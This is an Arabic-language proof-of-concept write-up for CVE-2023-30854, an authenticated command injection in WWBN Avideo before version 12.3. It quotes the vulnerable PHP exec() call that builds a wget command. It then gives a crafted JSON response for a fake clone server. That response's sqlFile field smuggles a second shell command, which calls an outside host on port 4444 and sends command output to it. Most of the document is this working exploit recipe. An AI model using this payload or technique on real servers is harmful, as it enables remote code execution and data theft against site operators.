
إثبات مفهوم لاستغلال CVE-2023-30854: حقن أوامر نظام التشغيل بعد المصادقة في WWBN Avideo < 12.3، مما يتيح تنفيذ التعليمات البرمجية عن بُعد عبر استجابة خادم استنساخ مُصمَّمة بعناية.
CVE-2023-30854 WWBN Avideo < 12.3 RCE بعد التحقق من الهوية
تتيح ثغرة حقن أوامر نظام التشغيل في نقطة نهاية تتطلب التحقق من الهوية /plugin/CloneSite/cloneClient.json.php للمهاجمين تحقيق تنفيذ كود عن بُعد.
الكود المعرض للثغرة:
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);
يمكننا التحكم في $objClone->cloneSiteURL من خلال ميزة استنساخ الموقع في لوحة الإدارة.
يُرسل /plugin/CloneSite/cloneClient.json.php طلب GET إلى {$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php. وقد استضفت ملفًا مُصمَّمًا خصيصًا باسم cloneServer.json.php يطبع بيانات JSON التالية
{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/demo.avideo.com\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget http://REDACTED:4444/`pwd` ;#","videoFiles":[],"photoFiles":[]}
أرسل طلب GET إلى /plugin/CloneSite/cloneClient.json.php وعندها يتحقق تنفيذ الكود عن بُعد.
